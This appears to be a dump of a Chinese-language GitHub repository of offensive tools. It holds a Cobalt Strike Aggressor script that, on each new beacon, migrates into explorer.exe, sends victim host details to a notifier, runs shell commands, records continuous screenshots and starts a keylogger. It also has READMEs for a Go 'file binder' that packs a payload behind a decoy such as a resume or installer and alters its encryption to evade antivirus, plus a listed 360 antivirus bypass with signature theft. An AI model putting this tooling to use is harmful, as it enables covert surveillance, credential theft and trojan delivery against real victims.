--------------------------------------------------------------------------------
 1 | on beacon_initial {
 2 | 	
 3 | 	#自动迁移进程
 4 | 	sub callback{
 5 | 		$regex = '(.*\n)+explorer.exe\t\d+\t(\d+)(.*\n)+';
 6 | 		# 要迁移的进程
 7 | 		$listener = "ecloud";
 8 | 		# 监听器名字，此处为ecloud，记得修改为自己的
 9 | 		if ($2 ismatch $regex){
10 | 			$pid = matched()[1];
11 | 			$inject_pid = $pid;
12 | 			if (-is64 $1){
13 | 				$arch = "x64";
14 | 			}
15 | 			else{
16 | 				$arch = "x86";
17 | 			}
18 | 			binject($1, $pid, $listener, $arch);
19 | 		}
20 | 	}
21 | 	if($inject_pid != beacon_info($1,"pid")){
22 | 		bps($1, &callback);
23 | 	}
24 | 
25 | 	#上线提醒
26 | 	println("Initial Beacon Checkin: " . $1 . " PID: " . beacon_info($1,"pid"));
27 | 	local('$internalIP $computerName $userName $process');
28 | 	$internalIP = replace(beacon_info($1,"internal")," ","_");
29 | 	$computerName = replace(beacon_info($1,"computer")," ","_");
30 | 	$userName = replace(beacon_info($1,"user")," ","_");
31 | 	$process = replace(beacon_info($1,"process")," ","_");
32 | 	$cmd = 'python3.9 /opt/tools/cs_open_jar/PushPlus.py' . " --computernam " . $computerName . " --internalip " . $internalIP . " --username " . $userName . " --process " . $process;
33 | 	println("Sending server: " . $cmd);
34 | 	exec($cmd);
35 | 
36 | 	#执行制定指定命令，用的shell命令 
37 | 	bshell($1, "ipconfig /all");
38 | 
39 | 	#只截一张图
40 | 	#binput($1, "screenshot");
41 |     #bscreenshot($1);
42 | 	
43 | 	#连续截图
44 | 	binput($1, "screenwatch");
45 |     bscreenwatch($1);
46 | 	
47 | 	#键盘记录
48 | 	bkeylogger($1);
49 | 
50 | }
51 | 
52 | 


--------------------------------------------------------------------------------
/CS插件/README.md:
--------------------------------------------------------------------------------
 1 | # CS插件
 2 | 
 3 | 
 4 | 
 5 | ## PushPlus2
 6 | 
 7 | 修改自项目[CS-PushPlus](https://github.com/lintstar/CS-PushPlus)，在原来上线自动提醒的基础上增加了如下功能：
 8 | 
 9 | * 上线自动截图
10 | 
11 | * 上线自动进程迁移
12 | * 上线执行自定义shell命令
13 | * 上线键盘记录 (新增2023-09-11)
14 | 
15 | ## 使用
16 | 不使用的功能直接删除就行，不影响运行。
17 | ![image](https://github.com/S9MF/my_script_tools/assets/48114638/51f89e80-57c7-4c9c-89ca-b72f17373e25)
18 | 
19 | 
20 | ## 效果
21 | ![image](https://github.com/S9MF/my_script_tools/assets/48114638/a26d262a-d689-498c-a6ca-2bbbbfe0026c)
22 | 建议挂在server端运行。
23 | 
24 | ## 参考
25 | [Aggressor Script](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/agressor_script.htm)
26 | 
27 | 


--------------------------------------------------------------------------------
/GoFilebundling/GoFilebundling1.1.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/my_script_tools/041c68a0325e9e20ffccec76eb0a1d6fc444346d/GoFilebundling/GoFilebundling1.1.exe


--------------------------------------------------------------------------------
/GoFilebundling/README.md:
--------------------------------------------------------------------------------
 1 | ## GoFilebundling
 2 | 
 3 | 二开自项目[GoFileBinder](https://github.com/Yihsiwei/GoFileBinder)，修改如下：
 4 | 
 5 | * 修改载荷释放路径
 6 | 
 7 | * 修改加密算法可免杀部分杀软
 8 | 
 9 | ```
10 |   ________      ___________.__.__        ___.                     .___.__  .__
11 |  /  _____/  ____\_   _____/|__|  |   ____\_ |__  __ __  ____    __| _/|  | |__| ____    ____
12 | /   \  ___ /  _ \|    __)  |  |  | _/ __ \| __ \|  |  \/    \  / __ | |  | |  |/    \  / ___\
13 | \    \_\  (  <_> )     \   |  |  |_\  ___/| \_\ \  |  /   |  \/ /_/ | |  |_|  |   |  \/ /_/  >
14 |  \______  /\____/\___  /   |__|____/\___  >___  /____/|___|  /\____ | |____/__|___|  /\___  /
15 |         \/           \/                 \/    \/           \/      \/              \//_____/
16 |                 GoFilebundling version: 1.1
17 | 
18 | [+] 恶意文件: calc.exe
19 | [+] 诱饵文件: flashcenter_pp_ax_install_cn.exe
20 | [+] 载荷路径: %public%
21 | [+] 载荷名称: pYvnE.tmp
22 | [+] 生成文件: sZPo.exe
23 | ```
24 | 
25 | 
26 | 
27 | ## 安装
28 | 
29 | 执行`GoFilebundling1.1.exe`前，先在`同目录下`运行`init.bat`初始化一个新的Go模块和安装非标准库依赖。
30 | 
31 | ```
32 | set GOPROXY=https://goproxy.cn,direct
33 | go mod init 1
34 | go get github.com/darkwyrm/b85
35 | go get github.com/gonutz/ide/w32
36 | ```
37 | 
38 | 
39 | 
40 | ## 使用
41 | 
42 | GoFilebundling1.1.exe -h
43 | 
44 | ```
45 |   ________      ___________.__.__        ___.                     .___.__  .__
46 |  /  _____/  ____\_   _____/|__|  |   ____\_ |__  __ __  ____    __| _/|  | |__| ____    ____
47 | /   \  ___ /  _ \|    __)  |  |  | _/ __ \| __ \|  |  \/    \  / __ | |  | |  |/    \  / ___\
48 | \    \_\  (  <_> )     \   |  |  |_\  ___/| \_\ \  |  /   |  \/ /_/ | |  |_|  |   |  \/ /_/  >
49 |  \______  /\____/\___  /   |__|____/\___  >___  /____/|___|  /\____ | |____/__|___|  /\___  /
50 |         \/           \/                 \/    \/           \/      \/              \//_____/
51 |                 GoFilebundling version: 1.1
52 | 
53 | 
54 | use:
55 |         GoFilebundling.exe 恶意文件 诱饵文件
56 |         GoFilebundling.exe main.exe 简历.pdf/flash.exe
57 | ```
58 | 
59 | 运行捆绑马执行顺序：
60 | 
61 | * 当前目录生成诱饵文件并打开
62 | * 在指定目录生成恶意文件并打开
63 | * 移动捆绑马到指定目录下(%public%, %temp%, %appdata%, %ProgramData%)
64 | 
65 | ## 参考
66 | 
67 | [Qianji](https://github.com/Pizz33/Qianji)
68 | 
69 | [GoFileBinder](https://github.com/Yihsiwei/GoFileBinder)
70 | 


--------------------------------------------------------------------------------
/GoFilebundling/init.bat:
--------------------------------------------------------------------------------
1 | set GOPROXY=https://goproxy.cn,direct
2 | go mod init 1
3 | go get github.com/darkwyrm/b85
4 | go get github.com/gonutz/ide/w32
5 | 
6 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # my_script_tools
 2 | 
 3 | | 脚本工具  |  说明  |
 4 | | :----:  |  :----:  |
 5 | | [360QVM_bypass修改版](https://github.com/S9MF/my_script_tools/blob/main/360QVM_bypass1.1/README.md) |  在原项目360QVM_bypass的基础上，进行修改增加随机文件名，随机文件信息，加上sigthief签名窃取功能。 |
 6 | | [CS插件](https://github.com/S9MF/my_script_tools/blob/main/CS%E6%8F%92%E4%BB%B6/README.md)  |  在原项目PushPlus的基础上，进行修改增加上线自动截图、上线自动进程迁移、上线执行自定义shell命令  |
 7 | | [GoFilebundling](https://github.com/S9MF/my_script_tools/blob/main/GoFilebundling/README.md)  |  在原项目GoFileBinder的基础上进行二开，修改加密算法可免杀部分杀软  |
 8 | 
 9 | 
10 | 


--------------------------------------------------------------------------------